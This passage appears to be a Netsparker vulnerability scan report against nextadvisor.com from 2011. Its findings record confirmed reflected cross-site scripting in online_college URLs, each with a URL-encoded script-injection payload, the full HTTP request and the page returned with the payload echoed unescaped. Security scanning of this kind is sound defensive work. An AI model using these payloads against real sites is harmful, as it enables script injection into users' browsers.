"1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_backup_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Backup & Cloud Storage FAQ</h1> <p>Frequently Asked Questions about Online Backup & Cloud Storage</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Backup & Cloud Storage:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_backup_services"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-..
- /online_college/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A7)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A7)%3C/script%3E

/online_college/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A7)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A7)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_college/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0002A7)</script>

Request

GET /online_college/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A7)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_college/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:07 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 7101
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online college, online colleges, online college reviews, compare online colleges, online college degree, online degrees, best online colleges, online schools review, online university reviews, compare online university, online universities, online education, e-learning, AIU Online, Capella University, Kaplan University, Walden University, Western Governors University, DeVry University, Westwood College, Colorado Technical University, South University, Liberty University" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_college/'"--></style></script><script>netsparker(0x0002A7)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002A7)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="/online_college/compare.php">All Degrees</a> <span class="nav_border">|</span> <a href="compare_business.php">Business Degrees</a> <span class="nav_border">|</span> <a href="compare_nursing.php">Nursing Degrees</a> <span class="nav_border">|</span> <a href="financial_aid.php">Financial Aid</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a> <span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_college_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online College Reviews FAQ</h1> <p>Frequently Asked Questions about Online College Reviews</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online College Reviews:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_college"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog201003..
- /online_college/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AA)%3C/script%3E

/online_college/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_college/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enet..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0002AA)</script>

Request

GET /online_college/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AA)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_college/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 7118
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online college, online colleges, online college reviews, compare online colleges, online college degree, online degrees, best online colleges, online schools review, online university reviews, compare online university, online universities, online education, e-learning, AIU Online, Capella University, Kaplan University, Walden University, Western Governors University, DeVry University, Westwood College, Colorado Technical University, South University, Liberty University" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_college/index.php'"--></style></script><script>netsparker(0x0002AA)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002AA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="/online_college/compare.php">All Degrees</a> <span class="nav_border">|</span> <a href="compare_business.php">Business Degrees</a> <span class="nav_border">|</span> <a href="compare_nursing.php">Nursing Degrees</a> <span class="nav_border">|</span> <a href="financial_aid.php">Financial Aid</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a> <span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_college_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online College Reviews FAQ</h1> <p>Frequently Asked Questions about Online College Reviews</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online College Reviews:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" 